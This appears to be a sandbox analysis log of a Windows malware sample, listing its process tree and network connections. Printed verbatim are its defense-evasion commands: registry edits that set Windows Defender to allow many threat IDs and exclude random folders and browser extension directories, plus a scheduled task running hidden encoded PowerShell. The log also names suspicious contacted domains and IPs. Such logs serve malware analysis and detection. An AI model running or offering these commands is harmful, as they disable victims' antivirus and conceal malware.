powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Users\Admin\AppData\Roaming\rdhvdej
C:\Users\Admin\AppData\Roaming\rdhvdej
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 392 -ip 392
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 348
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARePipIdpjkyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARePipIdpjkyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FWanxCyBMbSwDltdReR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FWanxCyBMbSwDltdReR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JwlnNCQPpOUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JwlnNCQPpOUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MEImWqZTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MEImWqZTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TJVxjIvMtcbU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TJVxjIvMtcbU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FMCDzQfSobwHqqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FMCDzQfSobwHqqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LLfSdsPOWigSJrdI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LLfSdsPOWigSJrdI\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARePipIdpjkyC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARePipIdpjkyC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARePipIdpjkyC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FWanxCyBMbSwDltdReR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JwlnNCQPpOUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FWanxCyBMbSwDltdReR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JwlnNCQPpOUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MEImWqZTU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MEImWqZTU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TJVxjIvMtcbU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TJVxjIvMtcbU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FMCDzQfSobwHqqVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FMCDzQfSobwHqqVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LLfSdsPOWigSJrdI /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LLfSdsPOWigSJrdI /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gfHpXHIGw" /SC once /ST 00:33:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gfHpXHIGw"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 147.45.40.172:80 | 147.45.40.172 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | 172.40.45.147.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 59.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| RU | 5.42.65.115:80 | 5.42.65.115 | tcp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | flex.sunaviat.com | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| RU | 193.233.132.216:80 | tcp | |
| US | 8.8.8.8:53 | gugle.fun | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 104.21.45.242:80 | flex.sunaviat.com | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.180.151:80 | 294down-river.sbs | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.154.10:443 | cleued.com | tcp |
| US | 104.21.69.242:443 | acenitive.shop | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.180.151:443 | 294down-river.sbs | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.178.79:443 | gugle.fun | tcp |
| US | 172.67.178.79:443 | gugle.fun | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| KR | 211.40.39.251:80 | cczhk.com | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.156.81:443 | pergor.com | tcp |
| US | 8.8.8.8:53 | 127.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.154.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.69.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.178.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.137.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:443 | gugle.fun | tcp |
| KR | 211.40.39.251:80 | cczhk.com | tcp |
| US | 8.8.8.8:53 | 251.39.40.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.156.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | 64.136.104.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-21.userapi.com | udp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-22.userapi.com | udp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-20.userapi.com | udp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | 2.206.142.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.206.142.95.in-addr.arpa | udp |
